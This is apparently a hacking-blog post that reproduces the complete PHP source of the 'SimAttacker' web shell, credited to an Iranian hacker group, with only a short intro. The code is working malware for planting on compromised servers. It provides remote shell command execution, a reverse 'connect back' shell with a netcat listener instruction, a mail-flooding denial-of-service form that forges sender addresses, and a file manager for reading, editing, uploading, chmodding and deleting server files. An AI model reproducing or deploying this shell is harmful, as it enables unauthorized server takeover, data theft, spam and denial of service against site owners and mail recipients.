HackingScripts

Hack Scripts for everybody

SimAttacker Shell

19 Feb 2014

I previously called this ‘best friends shell’. I now know that it’s called the SimAttacker shell.

Coded by Hossein Asgary, an Iranian hacker who is part of Simorgh Security Group.

SimAttacker Shell Source Code

  1 <?
  2 //download Files  Code
  3 $fdownload=$_GET['fdownload'];
  4 if ($fdownload <> "" ){
  5 // path & file name
  6 $path_parts = pathinfo("$fdownload");
  7 $entrypath=$path_parts["basename"];
  8 $name = "$fdownload";
  9 $fp = fopen($name, 'rb');
 10 header("Content-Disposition: attachment; filename=$entrypath");
 11 header("Content-Length: " . filesize($name));
 12 fpassthru($fp);
 13 exit;
 14 }
 15 ?>
 16     
 17 <html>
 18 
 19 <head>
 20 <meta http-equiv="Content-Language" content="en-us">
 21 <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
 22 <title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
 23 <style>
 24 <!--
 25 body         { font-family: Tahoma; font-size: 8pt }
 26 -->
 27 </style>
 28 </head>
 29 <body>
 30 <?
 31 error_reporting(E_ERROR | E_WARNING | E_PARSE);
 32 
 33  //File Edit
 34  $fedit=$_GET['fedit'];
 35  if ($fedit <> "" ){
 36  $fedit=realpath($fedit);
 37  $lines = file($fedit);
 38  echo "<form action='' method='POST'>";
 39 echo "<textarea name='savefile' rows=30 cols=80>" ;
 40 foreach ($lines as $line_num => $line) {
 41  echo htmlspecialchars($line);
 42 }
 43 echo "</textarea>
 44     <input type='text' name='filepath'  size='60' value='$fedit'>
 45     <input type='submit' value='save'></form>";
 46     $savefile=$_POST['savefile'];
 47     $filepath=realpath($_POST['filepath']);
 48     if ($savefile <> "") 
 49     {
 50     $fp=fopen("$filepath","w+");
 51     fwrite ($fp,"") ;
 52     fwrite ($fp,$savefile) ;
 53     fclose($fp);
 54     echo "<script language='javascript'> close()</script>";
 55     }
 56 exit();
 57  }
 58 ?>
 59 <?
 60 // CHmod - PRimission
 61 $fchmod=$_GET['fchmod'];
 62 if ($fchmod <> "" ){
 63 $fchmod=realpath($fchmod);
 64 echo "<center><br>
 65 chmod for :$fchmod<br>
 66 <form method='POST' action=''><br>
 67 Chmod :<br>
 68 <input type='text' name='chmod0' ><br>
 69 <input type='submit' value='change chmod'>
 70 </form>";
 71 $chmod0=$_POST['chmod0'];
 72 if ($chmod0 <> ""){
 73 chmod ($fchmod , $chmod0);
 74 }else {
 75 echo "primission Not Allow change Chmod";
 76 }
 77 exit();
 78 }
 79 ?>
 80     
 81 <div align="center">
 82     <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
 83         <tr>
 84             <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
 85                 <p align="center"><b>
 86                 <font face="Tahoma" size="2"><br>
 87                 </font>
 88                 <font color="#D2D200" face="Tahoma" size="2">
 89                 <span style="text-decoration: none">
 90                 <font color="#000000">
 91                 <a href="?id=fm&dir=<?
 92     echo getcwd();
 93     ?>
 94     ">
 95                 <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
 96                 <p align="center"><b><a href="?id=cmd">
 97                 <span style="text-decoration: none">
 98                 <font face="Tahoma" size="2" color="#000000">
 99                 CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
100                 <p align="center"><b><a href="?id=fake-mail">
101                 <font face="Tahoma" size="2" color="#000000">
102                 <span style="text-decoration: none">Fake mail</span></font></a></b></p>
103                 <p align="center"><b>
104                 <font face="Tahoma" size="2" color="#000000">
105                 <a href="?id=cshell">
106                 <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
107                 <p align="center"><b>
108                 <font color="#000000" face="Tahoma" size="2">
109                 <a href="?id=">
110                 <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
111                 <p>&nbsp;<p align="center">&nbsp;</td>
112             <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
113             <?
114             //*******************************************************
115             //Start Programs About US
116             $id=$_GET['id'];
117 
118             if ($id=="") {
119             echo "
120             <font face='Arial Black' color='#808080' size='1'>
121 ***************************************************************************<br>
122 &nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
123 &nbsp;Programer : Hossein Asgary <br>
124 &nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
125 &nbsp;please : If you find bug or problems in program , tell me by : <br>
126 &nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
127 Enjoy <img src="/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /> [Only 4 Best Friends ] <br>
128 ***************************************************************************</font></span></p>
129 ";
130 
131 echo "<font color='#333333' size='2'>OS :". php_uname();
132 echo "<br>IP :". 
133 ($_SERVER['REMOTE_ADDR']);
134 echo "</font>";
135 
136 
137             }
138             //************************************************************
139             //cmd-command line
140             $cmd=$_POST['cmd'];
141             if($id=="cmd"){
142         $result=shell_exec("$cmd");
143         echo "<br><center><h3> CMD ExeCute </h3></center>" ;
144         echo "<center>
145         <textarea rows=20 cols=70 >$result</textarea><br>
146         <form method='POST' action=''>
147         <input type='hidden' name='id' value='cmd'>
148         <input type='text' size='80' name='cmd' value='$cmd'>
149         <input type='submit' value='cmd'><br>";
150             
151             
152             
153             }
154             
155         //********************************************************    
156         
157         //fake mail = Use victim server 4 DOS - fake mail 
158         if ( $id=="fake-mail"){
159         error_reporting(0);
160         echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
161         echo "<center><form method='post' action=''>
162         Victim Mail :<br><input type='text' name='to' ><br>
163         Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
164         Comments:
165         <br>
166         <textarea rows='10' cols=50 name='Comments' ></textarea><br>
167         <input type='submit' value='Send Mail Strm ' >
168         </form></center>";
169         //send Storm Mail
170         $to=$_POST['to'];
171         $nom=$_POST['nom'];
172         $Comments=$_POST['Comments'];
173         if ($to <> "" ){
174         for ($i = 0; $i < $nom ; $i++){
175         $from = rand (71,1020000000)."@"."Attacker.com";
176         $subject= md5("$from");
177         mail($to,$subject,$Comments,"From:$from");
178         echo "$i is ok";
179         }      
180         echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
181         }
182         }
183         //********************************************************
184 
185             //Connect Back -Firewall Bypass
186             if ($id=="cshell"){
187             echo "<br>Connect back Shell , bypass Firewalls<br>
188             For user :<br>
189             nc -l -p 1019 <br>
190             <hr>
191             <form method='POST' action=''><br>
192             Your IP & BindPort:<br>
193             <input type='text' name='mip' >
194             <input type='text' name='bport' size='5' value='1019'><br>
195             <input type='submit' value='Connect Back'>
196             </form>";
197          $mip=$_POST['mip'];
198          $bport=$_POST['bport'];
199          if ($mip <> "")
200          {
201          $fp=fsockopen($mip , $bport , $errno, $errstr);
202          if (!$fp){
203                $result = "Error: could not open socket connection";
204          }
205          else {
206          fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
207       while(!feof($fp)){ 
208        fputs ($fp," bash # ");
209        $result= fgets ($fp, 4096);
210       $message=`$result`;
211        fputs ($fp,"--> ".$message."\n");
212       }
213       fclose ($fp);
214          }
215          }
216             }
217             
218         //********************************************************
219             //Spy File Manager
220             $homedir=getcwd();
221             $dir=realpath($_GET['dir'])."/";
222             if ($id=="fm"){
223             echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
224                   &nbsp;<b>
225                   <form action='' method='GET'>
226                   &nbsp;Path:</b>
227                   <input type='hidden' name='id' value='fm'>
228                   <input type='text' name='dir' size='80' value='$dir'>
229                   <input type='submit' value='dir'>
230                   </form>
231                  <br>";
232 
233             echo "
234 
235 <div align='center'>
236 
237 <table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
238     <tr>
239         <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
240         <td height='28' width='82' align='center'>
241         <font color='#000080' size='2'><b>Size KByte</b></font></td>
242         <td height='28' width='83' align='center'>
243         <font color='#008000' size='2'><b>Download</b></font></td>
244         <td height='28' width='66' align='center'>
245         <font color='#FF9933' size='2'><b>Edit</b></font></td>
246         <td height='28' width='75' align='center'>
247         <font color='#999999' size='2'><b>Chmod</b></font></td>
248         <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
249     </tr>";
250             if (is_dir($dir)){
251             if ($dh=opendir($dir)){
252             while (($file = readdir($dh)) !== false) {
253             $fsize=round(filesize($dir . $file)/1024);
254         
255             
256     echo " 
257     <tr>
258         <th width='250' height='22' align='left' nowrap>";
259         if (is_dir($dir.$file))
260         {
261         echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
262         }
263         else {
264         echo "<font size='2' color='#666666'>&nbsp;$file ";
265         }
266         echo "</a></font></th>
267         <td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
268         if (is_file($dir.$file))
269         {
270         echo "$fsize";
271         }
272         else {
273         echo "&nbsp; ";
274         }
275         echo "
276         </b></font></td>
277         <td width='103' align='center' nowrap>";
278         if (is_file($dir.$file)){
279         if (is_readable($dir.$file)){
280         echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
281         }else {
282         echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
283          }
284         }else {
285         echo "&nbsp;";
286          }
287         echo "
288         </a></font></td>
289         <td width='77' align='center' nowrap>";
290         if (is_file($dir.$file))
291         {
292         if (is_readable($dir.$file)){
293         echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
294         }else {
295         echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
296          }
297         }else {
298         echo "&nbsp;";
299          }
300         echo "
301         </a></font></td>
302         <td width='86' align='center' nowrap>";
303         if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
304         echo "<font size='1' color='#999999'>Dont in windows";
305         }
306         else {
307         echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
308         }
309         echo "</a></font></td>
310         <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
311     </tr>
312     ";
313               }
314               closedir($dh);
315             } 
316             }
317             echo "</table>
318 <form enctype='multipart/form-data' action='' method='POST'>
319  <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
320  Send this file: <input name='userfile' type='file' />
321  <inpt type='hidden' name='Fupath'  value='$dir'>
322  <input type='submit' value='Send File' />
323 </form> 
324             </div>";
325             }
326 //Upload Files 
327 $rpath=$_GET['dir'];
328 if ($rpath <> "") {
329 $uploadfile = $rpath."/" . $_FILES['userfile']['name'];
330 print "<pre>";
331 if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
332 echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
333 echo "<script language='javascript'> history.back(2)</script>";
334 }
335  }
336  //file deleted
337 $frpath=$_GET['fdelete'];
338 if ($frpath <> "") {
339 if (is_dir($frpath)){
340 $matches = glob($frpath . '/*.*');
341 if ( is_array ( $matches ) ) {
342   foreach ( $matches as $filename) {
343   unlink ($filename);
344   rmdir("$frpath");
345 echo "<script language='javascript'> alert('Success! Please refresh')</script>";
346 echo "<script language='javascript'> history.back(1)</script>";
347   }
348   }
349   }
350   else{
351 echo "<script language='javascript'> alert('Success! Please refresh')</script>";
352 unlink ("$frpath");
353 echo "<script language='javascript'> history.back(1)</script>";
354 exit(0);
355 
356   }
357   
358 
359 }
360             ?>
361             
362             </td>
363         </tr>
364         <tr>
365             <td style="border: 1px dotted #FFCC66">
366             <p align="center"><font color="#666666" size="1" face="Tahoma"><br>
367             Copyright 2004-Simorgh Security<br>
368             Hossein-Asgari<br>
369             </font><font color="#c0c0c0" size="1" face="Tahoma">
370         <a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
371         <font color="#666666">www.simorgh-ev.com</font></a></font></td>
372         </tr>
373     </table>
374 </div>
375 
376 </body>
377 
378 </html>

SimAttacker Shell screenshot

SimAttacker script screenshot

SimAttacker script screenshot